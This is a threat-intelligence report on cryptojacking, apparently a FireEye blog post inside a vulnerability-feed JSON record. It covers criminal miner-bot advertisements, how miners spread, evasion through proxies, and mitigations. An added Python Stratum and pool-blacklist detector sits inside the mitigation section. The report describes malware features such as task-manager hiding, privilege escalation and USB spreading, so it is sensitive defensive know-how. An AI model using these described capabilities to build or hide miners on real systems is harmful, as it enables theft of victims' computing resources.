According to the actor, the tool offered the following:\n\n_Windows Build Specifics_\n\n * Written in C++ (no dependencies)\n * Miner component based on XMRig\n * Easy cryptor and VPS hosting options\n * Web panel (Figure 7)\n * Uses TLS for secured communication\n * Download and execute\n * Auto-update ability\n * Cleanup routine\n * Receive remote commands\n * Perform privilege escalation\n * Features \"game mode\" (mining stops if user plays game)\n * Proxy feature (based on XMRig)\n * Support (for \u20ac20/month)\n * Kills other miners from list\n * Hidden from TaskManager\n * Configurable pool, coin, and wallet (via panel)\n * Can mine the following Cryptonight-based coins:\n * Monero\n * Bytecoin\n * Electroneum\n * DigitalNote\n * Karbowanec\n * Sumokoin\n * Fantomcoin\n * Dinastycoin\n * Dashcoin\n * LeviarCoin\n * BipCoin\n * QuazarCoin\n * Bitcedi\n\n_Linux Build Specifics_\n\n * Issues running on Linux servers (higher performance on desktop OS)\n * Compatible with AMD64 processors on Ubuntu, Debian, Mint (support for CentOS later)\n\n \nFigure 7: Miner bot web panel\n\n##### Sample Advertisement #5 (Miner + USB Spreader + DDoS Tool)\n\nIn August 2017, actor \"MeatyBanana\" was observed by FireEye iSIGHT Intelligence selling a Monero miner utility that included the ability to download and execute files and perform DDoS attacks. The actor offered the software for $30 USD, payable via Bitcoin. 
Ostensibly, the tool works with CPUs only and offers the following features:\n\n * Configurable miner pool and port (default to minergate)\n * Compatible with both 64- and 86-bit Windows OS\n * Hides from the following popular task managers:\n   * Windows Task Manager\n   * Process Killer\n   * KillProcess\n   * System Explorer\n   * Process Explorer\n   * AnVir\n   * Process Hacker\n * Masked as a system driver\n * Does not require administrator privileges\n * No dependencies\n * Registry persistence mechanism\n * Ability to perform \"tasks\" (download and execute files, navigate to a site, and perform DDoS)\n * USB spreader\n * Support after purchase\n\n#### The Cost of Cryptojacking\n\nThe presence of mining software on a network can generate costs on three fronts as the miner surreptitiously allocates resources:\n\n 1. Degradation in system performance\n 2. Increased cost in electricity\n 3. Potential exposure of security holes\n\nCryptojacking targets computer processing power, which can lead to high CPU load and degraded performance. In extreme cases, CPU overload may even cause the operating system to crash. Infected machines may also attempt to infect neighboring machines and therefore generate large amounts of traffic that can overload victims' computer networks.\n\nIn the case of operational technology (OT) networks, the consequences could be severe. Supervisory control and data acquisition/industrial control systems (SCADA/ICS) environments predominantly rely on decades-old hardware and low-bandwidth networks, so even a slight increase in CPU or network load could leave industrial infrastructures unresponsive, impeding operators from interacting with the controlled process in real time.\n\nThe electricity cost, measured in kilowatt-hours (kWh), is dependent upon several factors: how often the malicious miner software is configured to run, how many threads it's configured to use while running, and the number of machines mining on the victim's network. 
The cost per kWh is also highly variable and depends on geolocation. For example, security researchers who ran Coinhive on a machine for 24 hours found that the electrical consumption was 1.212kWh. They estimated that this equated to electrical costs per month of $10.50 USD in the United States, $5.45 USD in Singapore, and $12.30 USD in Germany.\n\nCryptojacking can also highlight often overlooked security holes in a company's network. Organizations infected with cryptomining malware are also likely vulnerable to more severe exploits and attacks, ranging from ransomware to ICS-specific malware such as [TRITON](<https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-triton-and-tristation.html>).\n\n#### Cryptocurrency Miner Distribution Techniques\n\nIn order to maximize profits, cyber criminals widely disseminate their miners using various techniques such as incorporating cryptojacking modules into existing botnets, drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, and distributing cryptojacking utilities via spam and self-propagating utilities. Threat actors can use cryptojacking to affect numerous devices and secretly siphon their computing power. Some of the most commonly observed devices targeted by these cryptojacking schemes are:\n\n * User endpoint machines\n * Enterprise servers\n * Websites\n * Mobile devices\n * Industrial control systems\n\n##### Cryptojacking in the Cloud\n\nPrivate sector companies and governments alike are increasingly [moving their data and applications to the cloud](<https://www.fireeye.com/blog/executive-perspective/2018/04/anatomy-of-a-public-cloud-compromise.html>), and cyber threat groups have been moving with them. Recently, there have been various reports of actors conducting cryptocurrency mining operations specifically targeting cloud infrastructure. 
Cloud infrastructure is increasingly a target for cryptojacking operations because it offers actors an attack surface with large amounts of processing power in an environment where CPU usage and electricity costs are already expected to be high, thus allowing their operations to potentially go unnoticed. We assess with high confidence that threat actors will continue to target enterprise cloud networks in efforts to harness their collective computational resources for the foreseeable future.\n\nThe following are some real-world examples of cryptojacking in the cloud:\n\n * In February 2018, FireEye researchers published a blog detailing various techniques actors used in order to deliver malicious miner payloads (specifically to vulnerable Oracle servers) by abusing CVE-2017-10271. Refer to our blog post for more detailed information regarding the [post-exploitation and pre-mining dissemination techniques](<https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html>) used in those campaigns.\n * In March 2018, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/coinminer-campaigns-move-to-the-cloud-via-docker-kubernetes/>) on the trend of cryptocurrency mining campaigns moving to the cloud via vulnerable Docker and Kubernetes applications, which are two software tools used by developers to help scale a company's cloud infrastructure. In most cases, successful attacks occur due to misconfigured applications and/or weak security controls and passwords.\n * In February 2018, [Bleeping Computer also reported](<https://www.bleepingcomputer.com/news/security/tesla-internal-servers-infected-with-cryptocurrency-miner/>) on hackers who breached Tesla's cloud servers to mine Monero. Attackers identified a Kubernetes console that was not password protected, allowing them to discover login credentials for the broader Tesla Amazon Web Services (AWS) S3 cloud environment. 
Once the attackers gained access to the AWS environment via the harvested credentials, they effectively launched their cryptojacking operations.\n * Reports of cryptojacking activity due to misconfigured AWS S3 cloud storage buckets have also been observed, as was the case in the [LA Times online compromise](<https://www.theregister.co.uk/2018/02/22/la_times_amazon_aws_s3/>) in February 2018. The presence of vulnerable AWS S3 buckets allows anyone on the internet to access and change hosted content, including the ability to inject mining scripts or other malicious software.\n\n##### Incorporation of Cryptojacking into Existing Botnets\n\nFireEye iSIGHT Intelligence has observed multiple prominent botnets such as Dridex and Trickbot incorporate cryptocurrency mining into their existing operations. Many of these families are modular in nature and have the ability to download and execute remote files, thus allowing the operators to easily turn their infections into cryptojacking bots. While these operations have traditionally been aimed at credential theft (particularly of banking credentials), adding mining modules or downloading secondary mining payloads provides the operators another avenue to generate additional revenue with little effort. This is especially true in cases where the victims were deemed unprofitable or have already been exploited in the original scheme.\n\nThe following are some real-world examples of cryptojacking being incorporated into existing botnets:\n\n * In early February 2018, FireEye iSIGHT Intelligence observed Dridex botnet ID 2040 download a Monero cryptocurrency miner based on the open-source XMRig miner.\n * On Feb. 12, 2018, FireEye iSIGHT Intelligence observed the banking malware IcedID injecting Monero-mining JavaScript into webpages for specific, targeted URLs. 
The IcedID injects launched an anonymous miner using the mining code from Coinhive's [AuthedMine](<https://authedmine.com/lib/authedmine.min.js>).\n * In late 2017, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/codefork-group-uses-fileless-malware-to-deploy-monero-miners/>) that security researchers with Radware observed the hacking group CodeFork leveraging the popular downloader Andromeda (aka Gamarue) to distribute a miner module to their existing botnets.\n * In late 2017, FireEye researchers observed Trickbot operators deploy a new module named \"testWormDLL\" that is a statically compiled copy of the popular XMRig Monero miner.\n * On Aug. 29, 2017, [Security Week reported](<https://www.securityweek.com/jimmy-banking-trojan-reuses-nukebot-code>) on a variant of the popular Neutrino banking Trojan, including a Monero miner module. According to their reporting, the new variant no longer aims at stealing bank card data, but instead is limited to downloading and executing modules from a remote server.\n\n#### Drive-By Cryptojacking\n\n##### In-Browser\n\nFireEye iSIGHT Intelligence has examined various customer reports of browser-based cryptocurrency mining. Browser-based mining scripts have been observed on compromised websites, third-party advertising platforms, and have been legitimately placed on websites by publishers. While coin mining scripts can be embedded directly into a webpage's source code, they are frequently loaded from third-party websites. Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers, such as in the case of a compromised website. Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors. At the time of reporting, the most popular script being deployed in the wild is Coinhive. 
Coinhive is an open-source JavaScript library that, when loaded on a vulnerable website, can mine Monero using the site visitor's CPU resources, unbeknownst to the user, as they browse the site.\n\nThe following are some real-world examples of Coinhive being deployed in the wild:\n\n * In September 2017, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/chrome-extension-embeds-in-browser-monero-miner-that-drains-your-cpu/>) that the authors of SafeBrowse, a Chrome extension with more than 140,000 users, had embedded the Coinhive script in the extension's code that allowed for the mining of Monero using users' computers and without getting their consent.\n * During mid-September 2017, [users on Reddit](<https://www.reddit.com/r/thepiratebay/comments/70aip7/100_cpu_on_all_8_threads_while_visiting_tpb/?sort=new>) began complaining about increased CPU usage when they navigated to a popular torrent site, The Pirate Bay (TPB). The spike in CPU usage was a result of Coinhive's script being embedded within the site's footer. According to TPB operators, it was implemented as a test to generate passive revenue for the site (Figure 8).\n * In December 2017, researchers with [Sucuri reported](<https://blog.sucuri.net/2017/12/malicious-cryptominers-from-github.html>) on the presence of the Coinhive script being hosted on GitHub.io, which allows users to publish web pages directly from GitHub repositories.\n * Other reporting disclosed the Coinhive script being embedded on the [Showtime domain](<https://www.bleepingcomputer.com/news/security/showtime-websites-used-to-mine-monero-unclear-if-hack-or-an-experiment/>) as well as on the [LA Times website](<https://www.itwire.com/security/81860-la-times-serving-cryptocurrency-mining-script.html>), both surreptitiously mining Monero.\n * A majority of in-browser cryptojacking activity is transitory in nature and will last only as long as the user\u2019s web browser is open. 
However, [researchers with Malwarebytes Labs](<https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptomining-coming-to-a-browser-near-you/>) uncovered a technique that allows for continued mining activity even after the browser window is closed. The technique leverages a pop-under window surreptitiously hidden under the taskbar. As researchers pointed out, closing the browser window may not be enough to interrupt the activity, and that more advanced actions like running the Task Manager may be required.\n\n \nFigure 8: Statement from TPB operators on Coinhive script\n\n##### Malvertising and Exploit Kits\n\nMalvertisements \u2013 malicious ads on legitimate websites \u2013 commonly redirect visitors of a site to an exploit kit landing page. These landing pages are designed to scan a system for vulnerabilities, exploit those vulnerabilities, and download and execute malicious code onto the system. Notably, the malicious advertisements can be placed on legitimate sites and visitors can become infected with little to no user interaction. This distribution tactic is commonly used by threat actors to widely distribute malware and has been employed in various cryptocurrency mining operations.\n\nThe following are some real-world examples of this activity:\n\n * In early 2018, [researchers with Trend Micro reported](<https://www.bleepingcomputer.com/news/security/coinhive-cryptojacker-deployed-on-youtube-via-google-ads/>) that a modified miner script was being disseminated across YouTube via Google's DoubleClick ad delivery platform. The script was configured to generate a random number variable between 1 and 100, and when the variable was above 10 it would launch the Coinhive script _coinhive.min.js_, which harnessed 80 percent of the CPU power to mine Monero. When the variable was below 10 it launched a modified Coinhive script that was also configured to harness 80 percent CPU power to mine Monero. 
This custom miner connected to the mining pool wss[:]//ws[.]l33tsite[.]info:8443, which was likely done to avoid Coinhive's fees.\n * In April 2018, researchers with [Trend Micro](<https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-web-miner-script-injected-into-aol-advertising-platform/>) also discovered a JavaScript code based on Coinhive injected into an AOL ad platform. The miner used the following private mining pools: wss[:]//wsX[.]www.datasecu[.]download/proxy and wss[:]//www[.]jqcdn[.]download:8893/proxy. Examination of other sites compromised by this campaign showed that in at least some cases the operators were hosting malicious content on unsecured AWS S3 buckets.\n * Since July 16, 2017, [FireEye has observed](<https://www.fireeye.com/blog/threat-research/2017/08/neptune-exploit-kit-malvertising.html>) the Neptune Exploit Kit redirect to ads for hiking clubs and MP3 converter domains. Payloads associated with the latter include Monero CPU miners that are surreptitiously installed on victims' computers.\n * In January 2018, [Check Point researchers](<https://research.checkpoint.com/new-rig-exploit-kit-campaign-dropping-xmrig-miner/>) discovered a malvertising campaign leading to the Rig Exploit Kit, which served the XMRig Monero miner utility to unsuspecting victims.\n\n#### Mobile Cryptojacking\n\nIn addition to targeting enterprise servers and user machines, threat actors have also targeted mobile devices for cryptojacking operations. While this technique is less common, likely due to the limited processing power afforded by mobile devices, cryptojacking on mobile devices remains a threat as sustained power consumption can damage the device and dramatically shorten the battery life. 
Threat actors have been observed targeting mobile devices by hosting malicious cryptojacking apps on popular app stores and through drive-by malvertising campaigns that identify users of mobile browsers.\n\nThe following are some real-world examples of mobile devices being used for cryptojacking:\n\n * During 2014, FireEye iSIGHT Intelligence reported on multiple Android malware apps capable of mining cryptocurrency:\n * In March 2014, Android malware named \"CoinKrypt\" was discovered, which mined Litecoin, Dogecoin, and CasinoCoin currencies.\n * In March 2014, another form of Android malware \u2013 \"Android.Trojan.MuchSad.A\" or \"ANDROIDOS_KAGECOIN.HBT\" \u2013 was observed mining Bitcoin, Litecoin, and Dogecoin currencies. The malware was disguised as copies of popular applications, including \"Football Manager Handheld\" and \"TuneIn Radio.\" Variants of this malware have reportedly been downloaded by millions of Google Play users.\n * In April 2014, Android malware named \"BadLepricon,\" which mined Bitcoin, was identified. The malware was reportedly being bundled into wallpaper applications hosted on the Google Play store, at least several of which received 100 to 500 installations before being removed.\n * In October 2014, a type of mobile malware called \"Android Slave\" was observed in China; the malware was reportedly capable of mining multiple virtual currencies.\n * In December 2017, [researchers with Kaspersky Labs reported](<https://securelist.com/jack-of-all-trades/83470/>) on a new multi-faceted Android malware capable of a variety of actions including mining cryptocurrencies and launching DDoS attacks. The resource load created by the malware has reportedly been high enough that it can cause the battery to bulge and physically destroy the device. The malware, dubbed Loapi, is unique in the breadth of its potential actions. 
It has a modular framework that includes modules for malicious advertising, texting, web crawling, Monero mining, and other activities. Loapi is thought to be the work of the same developers behind the 2015 Android malware Podec, and is usually disguised as an anti-virus app.\n * In January 2018, [SophosLabs released a report](<https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-coinminer-and-other-malicious-cryptominers-tpna.pdf?la=en>) detailing their discovery of 19 mobile apps hosted on Google Play that contained embedded Coinhive-based cryptojacking code, some of which were downloaded anywhere from 100,000 to 500,000 times.\n * Between November 2017 and January 2018, [researchers with Malwarebytes Labs reported](<https://blog.malwarebytes.com/threat-analysis/2018/02/drive-by-cryptomining-campaign-attracts-millions-of-android-users/>) on a drive-by cryptojacking campaign that affected millions of Android mobile browsers to mine Monero.\n\n#### Cryptojacking Spam Campaigns\n\nFireEye iSIGHT Intelligence has observed several cryptocurrency miners distributed via spam campaigns, which is a commonly used tactic to indiscriminately distribute malware. We expect malicious actors will continue to use this method to disseminate cryptojacking code for as long as cryptocurrency mining remains profitable.\n\nIn late November 2017, FireEye researchers identified a spam campaign delivering a malicious PDF attachment designed to appear as a legitimate invoice from the largest port and container service in New Zealand: Lyttelton Port of Christchurch (Figure 9). Once opened, the PDF would launch a PowerShell script that downloaded a Monero miner from a remote host. 
The malicious miner connected to the pools supportxmr.com and nanopool.org.\n\n \nFigure 9: Sample lure attachment (PDF) that downloads malicious cryptocurrency miner\n\nAdditionally, a massive cryptojacking spam campaign was discovered by FireEye researchers during January 2018 that was designed to look like legitimate financial services-related emails. The spam email directed victims to an infection link that ultimately dropped a malicious ZIP file onto the victim's machine. Contained within the ZIP file was a cryptocurrency miner utility (MD5: 80b8a2d705d5b21718a6e6efe531d493) configured to mine Monero and connect to the minergate.com pool. While each of the spam email lures and associated ZIP filenames were different, the same cryptocurrency miner sample was dropped across all observed instances (Table 2).\n\n**ZIP Filenames** \n \n--- \n \ncalifornia_540_tax_form_2013_instructions.exe\n\nstate_bank_of_india_money_transfer_agency.exe\n\nformat_transfer_sms_banking_bni_ke_bca.exe\n\nconfirmation_receipt_letter_sample.exe\n\nsbi_online_apply_2015_po.exe\n\nestimated_tax_payment_coupon_irs.exe\n\nhow_to_add_a_non_us_bank_account_to_paypal.exe\n\nwestern_union_money_transfer_from_uk_to_bangladesh.exe\n\ncan_i_transfer_money_from_bank_of_ireland_to_aib_online.exe\n\nhow_to_open_a_business_bank_account_with_bad_credit_history.exe\n\napply_for_sbi_credit_card_online.exe\n\nlist_of_lucky_winners_in_dda_housing_scheme_2014.exe \n \nTable 2: Sampling of observed ZIP filenames delivering cryptocurrency miner\n\n#### Cryptojacking Worms\n\nFollowing the WannaCry attacks, actors began to increasingly incorporate self-propagating functionality within their malware. Some of the observed self-spreading techniques have included copying to removable drives, brute forcing SSH logins, and leveraging the leaked NSA exploit [EternalBlue](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>). 
Cryptocurrency mining operations significantly benefit from this functionality since wider distribution of the malware multiplies the amount of CPU resources available to them for mining. Consequently, we expect that additional actors will continue to develop this capability.\n\nThe following are some real-world examples of cryptojacking worms:\n\n * In May 2017, [Proofpoint reported](<https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar>) a large campaign distributing mining malware \"Adylkuzz.\" This cryptocurrency miner was observed leveraging the EternalBlue exploit to rapidly spread itself over corporate LANs and wireless networks. This activity included the use of the DoublePulsar backdoor to download Adylkuzz. Adylkuzz infections create botnets of Windows computers that focus on mining Monero.\n * Security researchers with [SensorsTechForum identified](<https://sensorstechforum.com/w32-rarogminer-monero-miner-worm-lsass-exe-remove/>) a Monero miner worm, dubbed \"Rarogminer,\" in April 2018 that would copy itself to removable drives each time a user inserted a flash drive or external HDD.\n * In January 2018, [researchers at F5](<https://f5.com/labs/articles/threat-intelligence/malware/new-python-based-crypto-miner-botnet-flying-under-the-radar>) discovered a new Monero cryptomining botnet that targets Linux machines. PyCryptoMiner is a Python script that spreads via the SSH protocol. The bot can also use Pastebin for its command and control (C2) infrastructure. The malware spreads by trying to guess the SSH login credentials of target Linux systems. Once that is achieved, the bot deploys a simple base64-encoded Python script that connects to the C2 server to download and execute more malicious Python code.\n\n#### Detection Avoidance Methods\n\nAnother trend worth noting is the use of proxies to avoid detection. 
The implementation of mining proxies presents an attractive option for cyber criminals because it allows them to avoid developer and commission fees of 30 percent or more. Avoiding the use of common cryptojacking services such as Coinhive, Crypto-Loot, and Deepminer, and instead hosting cryptojacking scripts on actor-controlled infrastructure, can circumvent many of the common strategies taken to block this activity via domain or file name blacklisting.\n\nIn March 2018, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/in-browser-cryptojacking-is-getting-harder-to-detect/>) on the use of cryptojacking proxy servers and determined that as the use of cryptojacking proxy services increases, the effectiveness of ad blockers and browser extensions that rely on blacklists decreases significantly.\n\nSeveral mining proxy tools can be found on GitHub, such as the [XMRig Proxy](<https://github.com/xmrig/xmrig-proxy>) tool, which greatly reduces the number of active pool connections, and the [CoinHive Stratum Mining Proxy](<https://github.com/x25/coinhive-stratum-mining-proxy>), which uses Coinhive\u2019s JavaScript mining library to provide an alternative to using official Coinhive scripts and infrastructure.\n\nIn addition to using proxies, actors may also establish their own self-hosted miner apps, either on private servers or on cloud-based servers that support Node.js. Although private servers may provide some benefit over using a commercial mining service, they are still subject to easy blacklisting and require more operational effort to maintain. 
According to [Sucuri researchers](<https://blog.sucuri.net/2018/01/malicious-cryptominers-from-github-part-2.html>), cloud-based servers provide many benefits to actors looking to host their own mining applications, including:\n\n * Available free or at low-cost\n * No maintenance, just upload the crypto-miner app\n * Harder to block as blacklisting the host address could potentially impact access to legitimate services\n * Resilient to permanent takedown as new hosting accounts can more easily be created using disposable accounts\n\nThe combination of proxies and crypto-miners hosted on actor-controlled cloud infrastructure presents a significant hurdle to security professionals, as both make cryptojacking operations more difficult to detect and take down.\n\n#### Mining Victim Demographics\n\nBased on data from FireEye detection technologies, the detection of cryptocurrency miner malware has increased significantly since the beginning of 2018 (Figure 10), with the most popular mining pools being minergate and nanopool (Figure 11), and the most heavily affected country being the U.S. (Figure 12). 
Consistent with [other reporting](<https://www.bleepingcomputer.com/news/cryptocurrency/students-mining-cryptocurrencies-are-clogging-up-university-networks/>), the education sector remains most affected, likely due to more relaxed security controls across university networks and students taking advantage of free electricity to mine cryptocurrencies (Figure 13).\n\nFigure 10: Cryptocurrency miner detection activity per month\n\nFigure 11: Commonly observed pools and associated ports\n\nFigure 12: Top 10 affected countries\n\nFigure 13: Top five affected industries\n\nFigure 14: Top affected industries by country\n\n#### Mitigation Techniques\n\n##### Unencrypted Stratum Sessions\n\nAccording to security researchers at Cato Networks, in order for a miner to participate in pool mining, the infected machine has to run native or JavaScript-based code that uses the Stratum protocol over TCP or HTTP/S. The Stratum protocol uses a publish/subscribe architecture in which clients send subscription requests to join a pool and servers send (publish) messages to their subscribed clients. These messages are simple, readable JSON-RPC messages. Subscription requests include the following entities: id, method, and params (Figure 15). A deep packet inspection (DPI) engine can be configured to look for these parameters in order to block Stratum over unencrypted TCP.\n\nFigure 15: Stratum subscription request parameters\n\n##### Encrypted Stratum Sessions\n\nIn the case of JavaScript-based miners running Stratum over HTTPS, detection is more difficult for DPI engines that do not decrypt TLS traffic. To mitigate encrypted mining traffic on a network, organizations may blacklist the IP addresses and domains of popular mining pools. 
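Both cases just described can be handled in one inspection routine: an unencrypted Stratum session is recognized by its JSON-RPC structure (id, method and params, plus a method name from the mining vocabulary), and a TLS session falls back to matching the destination host or SNI against a pool blacklist. The Python below is an added example, not code from the FireEye post or from Cato Networks; the flow-record schema, the sample flows and the pool list (seeded only with the three pools this post names) are constructed for it.

```python
"""Classify client->server flows as mining traffic using the two checks
from the Mitigation Techniques section: Stratum JSON-RPC structure for
plaintext sessions, pool blacklist for TLS sessions.  All sample data
below is constructed for this example, not captured traffic."""
import json
from typing import Optional

# Request methods a miner sends: the classic "mining.*" Stratum vocabulary
# plus the CryptoNote/XMRig dialect ("login", "getjob", "submit", "keepalived").
STRATUM_METHODS = {
    "mining.subscribe", "mining.authorize", "mining.submit",
    "mining.extranonce.subscribe", "login", "getjob", "submit", "keepalived",
}

# Pools named in this post.  A deployment would load a maintained list instead.
POOL_DOMAINS = {"supportxmr.com", "nanopool.org", "minergate.com"}


def stratum_method(payload: bytes) -> Optional[str]:
    """Return the Stratum method if any line of a plaintext TCP payload is a
    JSON-RPC request carrying id/method/params with a mining method name."""
    for raw in payload.split(b"\n"):
        raw = raw.strip()
        if not raw.startswith(b"{"):
            continue  # cheap skip for HTTP headers, binary or blank lines
        try:
            msg = json.loads(raw.decode("utf-8", "replace"))
        except ValueError:
            continue
        if not isinstance(msg, dict):
            continue
        # Ordinary JSON-RPC APIs also carry id/method/params, so all three
        # entities AND a mining method name are required to avoid false hits.
        method = msg.get("method")
        if {"id", "method", "params"}.issubset(msg) and isinstance(method, str) \
                and method in STRATUM_METHODS:
            return method
    return None


def host_matches_pool(host: str, pools=POOL_DOMAINS) -> bool:
    """True if host is a blacklisted pool domain or one of its subdomains."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in pools)


def inspect_flow(flow: dict) -> dict:
    """Classify one flow record (constructed schema for this example):
    dst_host: destination hostname or TLS SNI ("" if unknown)
    tls:      True if the session is TLS, so the payload is unreadable
    payload:  first bytes the client sent, b"" for TLS sessions"""
    if not flow["tls"]:
        method = stratum_method(flow["payload"])
        if method:
            return {"verdict": "block", "reason": f"stratum request: {method}"}
    # Encrypted (or plaintext but not Stratum): only the destination is left.
    if flow["dst_host"] and host_matches_pool(flow["dst_host"]):
        return {"verdict": "block", "reason": f"known pool: {flow['dst_host']}"}
    return {"verdict": "allow", "reason": "no mining indicator"}


# Constructed sample flows (TEST-NET address and example.* hosts).
SAMPLE_FLOWS = [
    {   # plaintext XMRig-style login to a pool that is NOT on the blacklist
        "dst_host": "203.0.113.10", "tls": False,
        "payload": b'{"id":1,"jsonrpc":"2.0","method":"login","params":'
                   b'{"login":"WALLET_PLACEHOLDER","pass":"x","agent":"xmrig"}}\n',
    },
    {   # TLS session: payload unreadable, but the SNI is a pool subdomain
        "dst_host": "pool.supportxmr.com", "tls": True, "payload": b"",
    },
    {   # ordinary JSON-RPC call: has id/method/params but is not mining
        "dst_host": "api.example.net", "tls": False,
        "payload": b'{"id":7,"method":"getUser","params":[42]}\n',
    },
    {   # plain HTTP request to an unrelated host
        "dst_host": "www.example.org", "tls": False,
        "payload": b"GET / HTTP/1.1\r\nHost: www.example.org\r\n\r\n",
    },
]


def run_samples(flows=SAMPLE_FLOWS):
    """Return the verdict for each sample flow, in order."""
    return [inspect_flow(f) for f in flows]


if __name__ == "__main__":
    for flow, result in zip(SAMPLE_FLOWS, run_samples()):
        print(f"{flow['dst_host']:<22} {result['verdict']:<6} {result['reason']}")
```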
The downside to this approach is identifying and updating the blacklist, as locating a reliable and continually updated list of popular mining pools can prove difficult and time consuming.\n\n##### Browser-Based Sessions\n\nIdentifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers (as in the case of a compromised website). Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors.\n\nAs defenses evolve to prevent unauthorized coin mining activities, so will the techniques used by actors; however, blocking some of the most common indicators that we have observed to date may be effective in combating a significant amount of the CPU-draining mining activities that customers have reported. Generic detection strategies for browser-based cryptocurrency mining include:\n\n * Blocking domains known to have hosted coin mining scripts\n * Blocking the websites of known mining projects, such as Coinhive\n * Blocking scripts altogether\n * Using an ad-blocker or coin mining-specific browser add-ons\n * Detecting commonly used naming conventions\n * Alerting on and blocking traffic destined for known popular mining pools\n\nSome of these detection strategies may also be of use in blocking some mining functionality included in existing financial malware as well as mining-specific malware families.\n\nIt is important to note that JavaScript used in browser-based cryptojacking activity cannot access files on disk. However, if a host has inadvertently navigated to a website hosting mining scripts, we recommend purging cache and other browser data.\n\n#### Outlook\n\nIn underground communities and marketplaces there has been significant interest in cryptojacking operations, and numerous campaigns have been observed and reported by security researchers. 
These developments demonstrate the continued upward trend of threat actors conducting cryptocurrency mining operations, and we expect this focus to continue throughout 2018. Notably, malicious cryptocurrency mining may be seen as preferable due to the perception that it does not attract as much attention from law enforcement as compared to other forms of fraud or theft. Further, victims may not realize their computer is infected beyond a slowdown in system performance.\n\nDue to its inherent privacy-focused features and CPU-mining profitability, Monero has become one of the most attractive cryptocurrency options for cyber criminals. We believe that it will continue to be threat actors' primary cryptocurrency of choice, so long as the Monero blockchain maintains privacy-focused standards and is ASIC-resistant. If in the future the Monero protocol ever downgrades its security and privacy-focused features, then we assess with high confidence that threat actors will move to use another privacy-focused coin as an alternative.\n\nBecause of the anonymity associated with the Monero cryptocurrency and electronic wallets, as well as the availability of numerous cryptocurrency exchanges and tumblers, attribution of malicious cryptocurrency mining is very challenging for authorities, and malicious actors behind such operations typically remain unidentified. 
Threat actors will undoubtedly continue to demonstrate high interest in malicious cryptomining so long as it remains profitable and relatively low risk.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-18T10:00:00", "type": "fireeye", "title": "How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape: The Growth of Miners", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0099", "CVE-2017-10271"], "modified": "2018-07-18T10:00:00", "id": "FIREEYE:2473273CA0F291BCEBB5F99AA3E4F256", "href": "https://www.fireeye.com/blog/threat-research/2018/07/cryptocurrencies-cyber-crime-growth-of-miners.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-11-04T00:24:47", "description": "#### Introduction\n\nFireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.\n\nCVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions 12.2.1.2.0 and prior, and attackers can exploit it to remotely execute arbitrary code. 
Oracle released a [Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.\n\nFireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments.\n\nWe saw evidence of organizations located in various countries \u2013 including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical \u2013 being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. This coupled with the diversity of organizations potentially affected by this activity suggests that the external targeting calculus of these attacks is indiscriminate in nature.\n\nThe recent cryptocurrency boom has resulted in a growing number of operations \u2013 employing diverse tactics \u2013 aimed at stealing cryptocurrencies. 
